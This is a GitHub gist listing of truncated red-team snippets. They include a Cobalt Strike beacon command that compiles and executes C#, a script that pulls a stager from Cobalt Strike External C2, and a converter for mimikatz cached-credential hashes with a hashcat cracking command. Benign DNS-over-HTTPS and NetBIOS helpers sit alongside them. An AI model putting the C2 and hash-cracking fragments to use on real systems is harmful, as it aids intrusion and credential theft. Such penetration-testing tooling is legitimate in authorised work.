Skip to content

Instantly share code, notes, and snippets.

@dtmsecurity dtmsecurity

Block or report user

Report or block dtmsecurity

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@dtmsecurity
dtmsecurity / sharpgen.cna
Created Nov 8, 2018
SharpGen Aggressor Beacon Wrapper
View sharpgen.cna
$dotnetpath = "/usr/local/share/dotnet/dotnet";
$sharpgenpath = "/Users/dtmsecurity/Tools/SharpGen/bin/Debug/netcoreapp2.1/SharpGen.dll";
$temppath = "/tmp/";
beacon_command_register("sharpgen", "Compile and execute C-Sharp","Synopsis: sharpgen [code]\n");
alias sharpgen{
$executionId = "sharpgen_" . int(rand() * 100000);
$temporaryCsharp = $temppath . $executionId . ".cs";
$executableFilename = $temppath . $executionId . ".exe";
@dtmsecurity
dtmsecurity / getStager.py
Created Nov 8, 2018
Simple test script to get a stager from Cobalt Strike External C2
View getStager.py
import socket
import struct
def recv_frame(sock):
try:
chunk = sock.recv(4)
except:
return("")
if len(chunk) < 4:
return()
@dtmsecurity
dtmsecurity / doh_test.sh
Last active Oct 19, 2019
DNS over HTTPS (DoH) Resolver GET Test Script
View doh_test.sh
#!/bin/bash
printf "===START dns.google.com===\n"
curl -k -H "accept: application/dns-json" "https://dns.google.com/resolve?name=example.com&type=AAAA"
printf "\n===END dns.google.com===\n"
printf "===START cloudflare-dns.com===\n"
curl -k -H "accept: application/dns-json" "https://cloudflare-dns.com/dns-query?name=example.com&type=AAAA"
printf "\n===END cloudflare-dns.com===\n"
printf "===START 1.1.1.1===\n"
curl -k -H "accept: application/dns-json" "https://1.1.1.1/dns-query?name=example.com&type=AAAA"
printf "\n===END 1.1.1.1===\n"
View netbios_encode.py
# Implemented the reverse of the compact answer on:
# https://stackoverflow.com/questions/1965065/encode-netbios-name-python/1965140
def netbios_encode(input_string):
return ''.join([chr((ord(c)>>4)+ord('A'))+chr((ord(c)&0xF)+ord('A')) for c in input_string])
def netbios_decode(netbios):
i = iter(netbios.upper())
try:
return ''.join([chr(((ord(c)-ord('A'))<<4)+((ord(next(i))-ord('A'))&0xF)) for c in i])
@dtmsecurity
dtmsecurity / mscache.py
Created Oct 24, 2017
Needed a dirty way to convert mimikatz output for mscache to hashcat
View mscache.py
import sys
import re
# .\hashcat64.exe -m 2100 .\inhash.txt .\rockyou.txt
if len(sys.argv[1]) > 0:
fh = open(str(sys.argv[1]),"r")
lines = fh.readlines()
fh.close()
You can’t perform that action at this time.